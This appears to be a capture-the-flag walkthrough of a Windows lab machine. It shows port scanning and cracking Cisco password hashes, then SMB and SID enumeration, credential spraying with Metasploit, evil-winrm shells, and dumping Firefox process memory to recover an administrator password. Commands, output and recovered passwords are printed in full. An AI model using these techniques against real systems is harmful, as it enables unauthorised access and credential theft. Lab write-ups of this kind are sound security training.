Let’s start with a port scan:
$ nmap -A -T4 10.10.10.149 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 14:36 EDT Stats: 0:00:31 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 0.00% done Nmap scan report for 10.10.10.149 Host is up (0.20s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 | http-title: Support Login Page |_Requested resource was login.php 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: -1s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-10-30T18:37:11 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 82.67 seconds
As always, when there’s a web server, that’s the first thing that I look into, and there’s a login page:
Given that we can login as guest, let’s do it:
It looks like someone needed help with the configuration of a Cisco router and asked for help, it looks like it’s username is Hazard. Let’s check the attachment:
version 12.2 no service pad service password-encryption ! isdn switch-type basic-5ess ! hostname ios-1 ! security passwords min-length 12 enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91 ! username rout3r password 7 0242114B0E143F015F5D1E161713 username admin privilege 15 password 7 02375012182C1A1D751618034F36415408 ! ! ip ssh authentication-retries 5 ip ssh version 2 ! ! router bgp 100 synchronization bgp log-neighbor-changes bgp dampening network 192.168.0.0 mask 300.255.255.0 timers bgp 3 9 redistribute connected ! ip classless ip route 0.0.0.0 0.0.0.0 192.168.0.1 ! ! access-list 101 permit ip any any dialer-list 1 protocol ip list 101 ! no ip http server no ip http secure-server ! line vty 0 4 session-timeout 600 authorization exec SSH transport input ssh
Straight off we have three passwords hashes. The
secret 5 type can be cracked
with John the Ripper, so after writing it to a file, let’s run
john secret5 --wordlist=rockyou.txt. After a couple of seconds, we find out that the
The other two hashes can be decoded simply with an online tool, like this one, so here they are:
As we have a username and some passwords, we can try to authenticate to the
$ smbclient -L \\\\10.10.10.149 -U 'hazard%stealth1agent' Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.149 failed (Error NT_STATUS_IO_TIMEOUT) Failed to connect with SMB1 -- no workgroup available
Out of luck, because of the order that they are written in the file, the first one works!
We can use
impacket to enumerate users in the
$ ./lookupsid.py 10.10.10.149/hazard:firstname.lastname@example.org Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Brute forcing SIDs at 10.10.10.149 [*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112 500: SUPPORTDESK\Administrator (SidTypeUser) 501: SUPPORTDESK\Guest (SidTypeUser) 503: SUPPORTDESK\DefaultAccount (SidTypeUser) 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser) 513: SUPPORTDESK\None (SidTypeGroup) 1008: SUPPORTDESK\Hazard (SidTypeUser) 1009: SUPPORTDESK\support (SidTypeUser) 1012: SUPPORTDESK\Chase (SidTypeUser) 1013: SUPPORTDESK\Jason (SidTypeUser)
Getting a shell
We can now try to login with all usernames and passwords combinations that
we’ve found. There’s a handy metasploit module that can help us. After writing
all the users in a file called
users and the passwords in
pws, let’s load the
module and set the options:
And let’s run it with
Cool! We’ve found the passwords of Hazard and Chase! Now we can use
(install it with
gem install --user evil-winrm) to check if one of the two
users is allowed to get a remote shell:
$ evil-winrm -u Hazard -p stealth1agent -i 10.10.10.149 Evil-WinRM shell v2.0 Info: Establishing connection to remote endpoint Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError Error: Exiting with code 1
No luck with Hazard, let’s try with Chase:
$ evil-winrm -u Chase -p 'Q4)sJu\Y8qz*A3?d' -i 10.10.10.149 Evil-WinRM shell v2.0 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Chase\Documents>
And we got a shell! Let’s check the flag:
*Evil-WinRM* PS C:\Users\Chase\Desktop> Get-Acl user.txt Directory: C:\Users\Chase\Desktop Path Owner Access ---- ----- ------ user.txt SUPPORTDESK\Chase NT AUTHORITY\SYSTEM Allow FullControl...
Listing the files in the Desktop, there’s a curious one:
PS > type todo.txt Stuff to-do: 1. Keep checking the issues list. 2. Fix the router config. Done: 1. Restricted access for guest user.
Following the usual enumeration techniques and listing the running processes
Get-Process, reveals us that there are some instances of Firefox running,
which stands out among the others. The first thing that I did was to search in
AppData folder for Firefox data like bookmarks, visited URLs and
things like that, but I had no luck with it.
The next thing that came to my mind is to dump the processes memory with
After downloading it on our machine, and moving it in the same folder that we
evil-winrm from, we can upload it using it’s
Now we can dump the Firefox process memory using the PID from the
Because I’m a PowerShell noob, I’ve downloaded the dump on my machine to
analyze it, with
download firefox.exe_191129_053757.dmp and after (quite) a
bit of time I started searching for strings.
An interesting string to find in the memory dump would be
password, so let’s
search for it:
$ strings firefox.exe_191129_053757.dmp | grep -i password "C:\Program Files\Mozilla Firefox\firefox.exe" email@example.com&login_password=4dD!5}x/re8]FBuZ&login= MOZ_CRASHREPORTER_RESTART_ARG_1firstname.lastname@example.org&login_password=4dD!5}x/re8]FBuZ&login= email@example.com&login_password=4dD!5}x/re8]FBuZ&login= MOZ_CRASHREPORTER_RESTART_ARG_1firstname.lastname@example.org&login_password=4dD!5}x/re8]FBuZ&login= http://email@example.com&login_password=4dD!5}x/re8]FBuZ&login=
Bingo! And we can get a shell with these credentials:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> Get-Acl root.txt Directory: C:\Users\Administrator\Desktop Path Owner Access ---- ----- ------ root.txt BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow FullControl...
And we have access to the root flag!
I have to admit this one took me quite a bit of time, even though it was only 20
points, because I went down the
AppData folder rabbit hole, and there were
some cache files and a password database that looked interesting. This is the
first time that I’ve analyzed a process’ memory, which is an interesting
Thanks for reading!